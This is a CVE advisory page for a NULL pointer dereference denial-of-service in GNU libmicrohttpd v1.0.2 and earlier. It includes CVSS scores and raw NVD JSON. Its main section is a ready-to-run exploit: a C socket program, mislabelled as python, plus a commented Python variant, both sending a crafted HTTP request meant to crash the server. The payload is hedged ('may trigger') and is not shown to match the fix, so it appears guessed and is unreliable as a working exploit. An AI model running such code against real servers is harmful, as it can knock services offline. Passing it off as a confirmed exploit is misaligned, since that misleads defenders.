Security Vulnerability Report
中文
CVE-2025-59777 CVSS 7.5 HIGH

CVE-2025-59777

Published: 2025-11-10 05:15:44
Last Modified: 2025-11-14 18:07:34
Source: [email protected]

Description

NULL pointer dereference vulnerability exists in GNU libmicrohttpd v1.0.2 and earlier. The vulnerability was fixed in commit ff13abc on the master branch of the libmicrohttpd Git repository, after the v1.0.2 tag. A specially crafted packet sent by an attacker could cause a denial-of-service (DoS) condition.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:libmicrohttpd:*:*:*:*:*:*:*:* - VULNERABLE
GNU libmicrohttpd <= v1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-59777 PoC - GNU libmicrohttpd NULL Pointer Dereference * This PoC demonstrates sending a crafted packet to trigger NULL pointer dereference * in libmicrohttpd <= v1.0.2 * * Note: This is for educational and security testing purposes only. * Author: Security Research * Reference: https://git.gnunet.org/libmicrohttpd.git/commit/?id=ff13abc1c1d7d2b30d69d5c0bd4a237e1801c50b */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define TARGET_IP "127.0.0.1" #define TARGET_PORT 8080 /* Crafted HTTP request that may trigger NULL pointer dereference */ const char* exploit_payload = "GET / HTTP/1.1\r\n" "Host: localhost\r\n" "Connection: keep-alive\r\n" "Accept-Encoding: ,\r\n" /* Malformed header to trigger edge case */ "X-Trigger-Null: \r\n" "\r\n"; int main(int argc, char* argv[]) { int sock_fd; struct sockaddr_in target_addr; printf("[*] CVE-2025-59777 PoC for libmicrohttpd NULL Pointer Dereference\n"); printf("[*] Target: %s:%d\n", TARGET_IP, TARGET_PORT); /* Create socket */ sock_fd = socket(AF_INET, SOCK_STREAM, 0); if (sock_fd < 0) { perror("[-] Socket creation failed"); return 1; } /* Setup target address */ memset(&target_addr, 0, sizeof(target_addr)); target_addr.sin_family = AF_INET; target_addr.sin_port = htons(TARGET_PORT); inet_pton(AF_INET, TARGET_IP, &target_addr.sin_addr); /* Connect to target */ if (connect(sock_fd, (struct sockaddr*)&target_addr, sizeof(target_addr)) < 0) { perror("[-] Connection failed"); close(sock_fd); return 1; } printf("[+] Connected to target\n"); /* Send crafted payload */ printf("[*] Sending crafted HTTP request...\n"); ssize_t sent = send(sock_fd, exploit_payload, strlen(exploit_payload), 0); if (sent > 0) { printf("[+] Payload sent successfully (%zd bytes)\n", sent); printf("[*] If vulnerable, the server should crash with NULL pointer dereference\n"); } else { printf("[-] Failed to send payload\n"); } /* Wait and observe */ sleep(2); /* Try to receive response */ char buffer[1024]; ssize_t received = recv(sock_fd, buffer, sizeof(buffer) - 1, 0); if (received > 0) { buffer[received] = '\0'; printf("[*] Received response:\n%s\n", buffer); } else { printf("[*] No response or connection closed (possible crash)\n"); } close(sock_fd); return 0; } /* Alternative Python PoC */ /* import socket import sys target_host = "127.0.0.1" target_port = 8080 # Crafted payload to trigger NULL pointer dereference payload = ( b"GET / HTTP/1.1\r\n" b"Host: localhost\r\n" b"Connection: keep-alive\r\n" b"Accept-Encoding: ,\r\n" b"X-Trigger-Null: \r\n\r\n" ) try: print(f"[*] Connecting to {target_host}:{target_port}") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_host, target_port)) print("[*] Sending exploit payload...") s.send(payload) print("[*] Payload sent. Observing server response...") s.settimeout(3) try: response = s.recv(4096) print(f"[*] Response received: {response}") except socket.timeout: print("[*] No response (possible DoS condition)") except Exception as e: print(f"[-] Error: {e}") finally: s.close() */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59777", "sourceIdentifier": "[email protected]", "published": "2025-11-10T05:15:44.117", "lastModified": "2025-11-14T18:07:33.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL pointer dereference vulnerability exists in GNU libmicrohttpd v1.0.2 and earlier. The vulnerability was fixed in commit ff13abc on the master branch of the libmicrohttpd Git repository, after the v1.0.2 tag. A specially crafted packet sent by an attacker could cause a denial-of-service (DoS) condition."}, {"lang": "es", "value": "Una vulnerabilidad de desreferencia de puntero NULL existe en GNU libmicrohttpd v1.0.2 y anteriores. La vulnerabilidad fue corregida en el commit ff13abc en la rama master del repositorio Git de libmicrohttpd, después de la etiqueta v1.0.2. Un paquete especialmente diseñado enviado por un atacante podría causar una condición de denegación de servicio (DoS)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:libmicrohttpd:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-09-16", "matchCriteriaId": "71349595-7325-41D9-B13D-D5C04F7F0679"}]}]}], "references": [{"url": "https://git.gnunet.org/libmicrohttpd.git/commit/?id=ff13abc1c1d7d2b30d69d5c0bd4a237e1801c50b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://jvn.jp/en/jp/JVN76719218/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.gnu.org/software/libmicrohttpd/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.